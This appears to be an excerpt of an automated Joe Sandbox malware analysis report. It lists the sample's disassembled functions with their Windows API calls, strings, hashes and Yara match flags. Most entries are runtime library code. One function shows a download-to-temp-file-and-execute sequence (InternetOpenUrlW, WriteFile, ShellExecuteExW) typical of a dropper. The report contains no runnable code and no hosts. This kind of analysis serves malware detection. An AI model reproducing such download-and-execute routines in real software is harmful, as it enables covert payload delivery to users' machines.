                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$Info
                                                                                  • String ID:
                                                                                  • API String ID: 2509303402-0
                                                                                  • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                  • Instruction ID: 4a495a682cf33c40588cea2d45260434deb5fa940380e113f863be880c77baf2
                                                                                  • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                  • Instruction Fuzzy Hash: 02B1B1B19002059FEB119F68CC80BFEBBF5BF08304F144A6DE895E7251DBB5B9459B21
                                                                                  Function 04850C46 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 136threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 04850C56
                                                                                  • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 04850CBD
                                                                                  • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 04850CDA
                                                                                  • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 04850D40
                                                                                  • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 04850D55
                                                                                  • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 04850D67
                                                                                  • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 04850D95
                                                                                  • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 04850DA0
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04850DCC
                                                                                  • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 04850DDC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                  • String ID: 11@$%D
                                                                                  • API String ID: 3720063390-4114847594
                                                                                  • Opcode ID: 6daf059359ebdef5a4ede7147139a3b2708b04212e06e16dc02b70a899e44c79
                                                                                  • Instruction ID: 3c6ac15189e5f34e602585c5f0710260fd84ded367c493217be71e80672eaac6
                                                                                  • Opcode Fuzzy Hash: 6daf059359ebdef5a4ede7147139a3b2708b04212e06e16dc02b70a899e44c79
                                                                                  • Instruction Fuzzy Hash: EE41B430A042489BEF15FFA8C4647AD7765AF42308F144FA9CC45DB2A2DBA57A05C7A3
                                                                                  Function 0043A618 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___free_lconv_mon.LIBCMT ref: 0043A65C
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 004399C8
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 004399DA
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 004399EC
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 004399FE
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A10
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A22
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A34
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A46
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A58
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A6A
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A7C
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A8E
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439AA0
                                                                                  • _free.LIBCMT ref: 0043A651
                                                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                                                  • _free.LIBCMT ref: 0043A673
                                                                                  • _free.LIBCMT ref: 0043A688
                                                                                  • _free.LIBCMT ref: 0043A693
                                                                                  • _free.LIBCMT ref: 0043A6B5
                                                                                  • _free.LIBCMT ref: 0043A6C8
                                                                                  • _free.LIBCMT ref: 0043A6D6
                                                                                  • _free.LIBCMT ref: 0043A6E1
                                                                                  • _free.LIBCMT ref: 0043A719
                                                                                  • _free.LIBCMT ref: 0043A720
                                                                                  • _free.LIBCMT ref: 0043A73D
                                                                                  • _free.LIBCMT ref: 0043A755
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                  • String ID:
                                                                                  • API String ID: 161543041-0
                                                                                  • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                  • Instruction ID: 8150cfcbb8d97c1a634bb94bc0336974ffbd25353871f942fa72eec07d372a2d
                                                                                  • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                  • Instruction Fuzzy Hash: D4316E315002009EEB219B35D886B5B73E8FF58315F14A51FE4D9CA251DB7AED508B1A
                                                                                  Function 0486A87F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___free_lconv_mon.LIBCMT ref: 0486A8C3
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869C2F
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869C41
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869C53
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869C65
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869C77
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869C89
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869C9B
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869CAD
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869CBF
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869CD1
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869CE3
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869CF5
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869D07
                                                                                  • _free.LIBCMT ref: 0486A8B8
                                                                                    • Part of subcall function 048636F1: HeapFree.KERNEL32(00000000,00000000,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?), ref: 04863707
                                                                                    • Part of subcall function 048636F1: GetLastError.KERNEL32(?,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?,?), ref: 04863719
                                                                                  • _free.LIBCMT ref: 0486A8DA
                                                                                  • _free.LIBCMT ref: 0486A8EF
                                                                                  • _free.LIBCMT ref: 0486A8FA
                                                                                  • _free.LIBCMT ref: 0486A91C
                                                                                  • _free.LIBCMT ref: 0486A92F
                                                                                  • _free.LIBCMT ref: 0486A93D
                                                                                  • _free.LIBCMT ref: 0486A948
                                                                                  • _free.LIBCMT ref: 0486A980
                                                                                  • _free.LIBCMT ref: 0486A987
                                                                                  • _free.LIBCMT ref: 0486A9A4
                                                                                  • _free.LIBCMT ref: 0486A9BC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                  • String ID:
                                                                                  • API String ID: 161543041-0
                                                                                  • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                  • Instruction ID: a485b4e36c5104c1536db98a0e049c6c76f61521c3a096f854c4d3698e7d8a3d
                                                                                  • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                  • Instruction Fuzzy Hash: 1231BF715002019FEBA56F7CD841B5673E9AF02394F214E1DE86BE7250DEB1B8509725
                                                                                  Function 00439AA9 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID:
                                                                                  • API String ID: 269201875-0
                                                                                  • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                  • Instruction ID: 14d391df4236cd99baad955409263e6980f1ff06ffe499d5f8ebd119726a11a8
                                                                                  • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                  • Instruction Fuzzy Hash: 16C14772D40205BBDB20DB98CC46FDEB7F8AB4C708F15515AFA04FB282D6B59E418B64
                                                                                  Function 04832C7B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 04832C9E
                                                                                  • InternetOpenUrlW.WININET(00000000,0045D830,00000000,00000000,00000000,00000000), ref: 04832CB4
                                                                                  • GetTempPathW.KERNEL32(00000105,?), ref: 04832CD0
                                                                                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 04832CE6
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 04832D1F
                                                                                  • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 04832D5B
                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 04832D78
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 04832DEF
                                                                                  • WaitForSingleObject.KERNEL32(?,00008000), ref: 04832E04
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                  • String ID: <
                                                                                  • API String ID: 838076374-4251816714
                                                                                  • Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                  • Instruction ID: 78bcd1e40c2cdb744e61959c60d9c264b6a1f64465dcedb1afe985e7c1aae829
                                                                                  • Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                  • Instruction Fuzzy Hash: A8412E7190021CAEEB219F64DC85FEAB7BCFF05746F0085F9A549E2150DE70AE858FA4
                                                                                  Function 0042486D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 104threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424886
                                                                                    • Part of subcall function 00424B55: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,004245B9), ref: 00424B65
                                                                                  • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042489B
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004248AA
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004248B8
                                                                                  • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042492E
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042496E
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0042497C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                  • String ID: 11@$pContext$switchState
                                                                                  • API String ID: 3151764488-3851367110
                                                                                  • Opcode ID: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                                                  • Instruction ID: b5099d2659ab5da3d856e1a370161b96529dd65552012442df5f2ab280934ec0
                                                                                  • Opcode Fuzzy Hash: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                                                  • Instruction Fuzzy Hash: 1331E575B002249BCF04EF65D881A6E77B5FF84314F60446BE915A7382DB78EE05C798
                                                                                  Function 0484EEE2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C33,000000FF,?,0484F248,00000004,04847DA7,00000004,04848089), ref: 0484EF19
                                                                                  • GetLastError.KERNEL32(?,0484F248,00000004,04847DA7,00000004,04848089,?,048487B9,?,00000008,0484802D,00000000,?,?,00000000,?), ref: 0484EF25
                                                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,0484F248,00000004,04847DA7,00000004,04848089,?,048487B9,?,00000008,0484802D,00000000,?,?,00000000), ref: 0484EF35
                                                                                  • GetProcAddress.KERNEL32(00000000,00447430), ref: 0484EF4B
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EF61
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EF78
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EF8F
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EFA6
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EFBD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                  • String ID: advapi32.dll
                                                                                  • API String ID: 2340687224-4050573280
                                                                                  • Opcode ID: 42b6543bbc8b29be41a8bf3c8b8dff5f6d345e4297bc09f77771cd86560ab435
                                                                                  • Instruction ID: 46d54b93af5a69020c7c8eeaf33ba53ad2178621ca27be100c65ff21f433db61
                                                                                  • Opcode Fuzzy Hash: 42b6543bbc8b29be41a8bf3c8b8dff5f6d345e4297bc09f77771cd86560ab435
                                                                                  • Instruction Fuzzy Hash: C32195B1908714BFE7106FB89C08A69BFACFF45B56F104A66F541D3650CBBCD4408BA9
                                                                                  Function 0484EEE5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C33,000000FF,?,0484F248,00000004,04847DA7,00000004,04848089), ref: 0484EF19
                                                                                  • GetLastError.KERNEL32(?,0484F248,00000004,04847DA7,00000004,04848089,?,048487B9,?,00000008,0484802D,00000000,?,?,00000000,?), ref: 0484EF25
                                                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,0484F248,00000004,04847DA7,00000004,04848089,?,048487B9,?,00000008,0484802D,00000000,?,?,00000000), ref: 0484EF35
                                                                                  • GetProcAddress.KERNEL32(00000000,00447430), ref: 0484EF4B
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EF61
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EF78
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EF8F
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EFA6
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EFBD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                  • String ID: advapi32.dll
                                                                                  • API String ID: 2340687224-4050573280
                                                                                  • Opcode ID: 568b270db7864284fcb8ae39da317007db6e00d9f6bba130ca6b7ecd6e9fa7a9
                                                                                  • Instruction ID: f03c1f1417d562d7d455b2a66528a278566f98a519302d45c7d40a1b3d0051e5
                                                                                  • Opcode Fuzzy Hash: 568b270db7864284fcb8ae39da317007db6e00d9f6bba130ca6b7ecd6e9fa7a9
                                                                                  • Instruction Fuzzy Hash: 1C2192B1908714BBE7106F789C08A6ABFECFF45B56F004A66F541D3650CBBCE4408BA9
                                                                                  Function 048424C7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0484672B), ref: 048424D6
                                                                                  • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 048424E4
                                                                                  • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 048424F2
                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0484672B), ref: 04842520
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 04842527
                                                                                  • GetLastError.KERNEL32(?,?,?,0484672B), ref: 04842542
                                                                                  • GetLastError.KERNEL32(?,?,?,0484672B), ref: 0484254E
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 04842564
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04842572
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                  • String ID: kernel32.dll
                                                                                  • API String ID: 4179531150-1793498882
                                                                                  • Opcode ID: e08c19642d7b700cf60faa8aebbbf92ec784f63dcc7f1ccf2d9f7600249f9a07
                                                                                  • Instruction ID: 9847fb47ec0d2e382ea3d5c0f15c50e86aae0a7f2f2b3dbebf561a43f0ec4e3c
                                                                                  • Opcode Fuzzy Hash: e08c19642d7b700cf60faa8aebbbf92ec784f63dcc7f1ccf2d9f7600249f9a07
                                                                                  • Instruction Fuzzy Hash: 301125759043187FF710BB78AC88A3B7BACAD81A877110E66F801D31A1EF78E540866D
                                                                                  Function 0043EEC2 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004401AF), ref: 0043EEE5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: DecodePointer
                                                                                  • String ID: 11@$acos$asin$exp$log$log10$pow$sqrt
                                                                                  • API String ID: 3527080286-2461957735
                                                                                  • Opcode ID: c5a83a7c3a5692031bd98a2408cfaa5972c38f8111fe63a4894d5265efbafef3
                                                                                  • Instruction ID: 47f9428d28cfd6d6d0fcc487ca1ad96a5e838d4e1f3ed62f9574ed722bc2da70
                                                                                  • Opcode Fuzzy Hash: c5a83a7c3a5692031bd98a2408cfaa5972c38f8111fe63a4894d5265efbafef3
                                                                                  • Instruction Fuzzy Hash: 1A51A07490160ADBCF14DFA8E6481AEBBB0FF0D300F6551A7E480AB255C7798D29CB1E
                                                                                  Function 00419766 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419788
                                                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419792
                                                                                  • DuplicateHandle.KERNEL32(00000000), ref: 00419799
                                                                                  • SafeRWList.LIBCONCRT ref: 004197B8
                                                                                    • Part of subcall function 00417787: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417798
                                                                                    • Part of subcall function 00417787: List.LIBCMT ref: 004177A2
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197CA
                                                                                  • GetLastError.KERNEL32 ref: 004197D9
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197EF
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004197FD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                  • String ID: eventObject
                                                                                  • API String ID: 1999291547-1680012138
                                                                                  • Opcode ID: f2fd52a031fb61bc76af8f85f01e8766478cf52a27c2f29204c16f3f9ad69e75
                                                                                  • Instruction ID: 74ee1ce6077461ea63ae9e00130f3aceb1e9566028cac9141ddd6988e3fa2b51
                                                                                  • Opcode Fuzzy Hash: f2fd52a031fb61bc76af8f85f01e8766478cf52a27c2f29204c16f3f9ad69e75
                                                                                  • Instruction Fuzzy Hash: 6511A075600105EACB14EFA5CC49FEF77B8AF00701F20012BF42AE21D1DB789E85866D
                                                                                  Function 0041515E Relevance: 15.2, APIs: 10, Instructions: 175COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415269
                                                                                    • Part of subcall function 00414C7A: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00414C8E
                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415292
                                                                                    • Part of subcall function 004130F4: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00413110
                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004152B9
                                                                                  • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415173
                                                                                    • Part of subcall function 00413158: __EH_prolog3_GS.LIBCMT ref: 0041315F
                                                                                    • Part of subcall function 00413158: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 0041316E
                                                                                    • Part of subcall function 00413158: GetProcessAffinityMask.KERNEL32(00000000), ref: 00413175
                                                                                    • Part of subcall function 00413158: GetCurrentThread.KERNEL32 ref: 0041319D
                                                                                    • Part of subcall function 00413158: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 004131A7
                                                                                  • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415194
                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151CB
                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 0041520E
                                                                                  • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00415301
                                                                                  • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415325
                                                                                  • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00415332
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
                                                                                  • String ID:
                                                                                  • API String ID: 64082781-0
                                                                                  • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                  • Instruction ID: 3c4a00c01101e3417d492a63c26e06d94b1efbede92b5aee1480a2ddfdefe69c
                                                                                  • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                  • Instruction Fuzzy Hash: A3618D71A00715DFDB18CFA5E8926EEB7B1FB84316F24806ED45697252C738A981CF4C
                                                                                  Function 048453C5 Relevance: 15.2, APIs: 10, Instructions: 175COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 048454D0
                                                                                    • Part of subcall function 04844EE1: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 04844EF5
                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 048454F9
                                                                                    • Part of subcall function 0484335B: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 04843377
                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 04845520
                                                                                  • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 048453DA
                                                                                    • Part of subcall function 048433BF: __EH_prolog3_GS.LIBCMT ref: 048433C6
                                                                                    • Part of subcall function 048433BF: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 048433D5
                                                                                    • Part of subcall function 048433BF: GetProcessAffinityMask.KERNEL32(00000000), ref: 048433DC
                                                                                    • Part of subcall function 048433BF: GetCurrentThread.KERNEL32 ref: 04843404
                                                                                    • Part of subcall function 048433BF: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0484340E
                                                                                  • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 048453FB
                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 04845432
                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 04845475
                                                                                  • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 04845568
                                                                                  • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 0484558C
                                                                                  • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 04845599
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
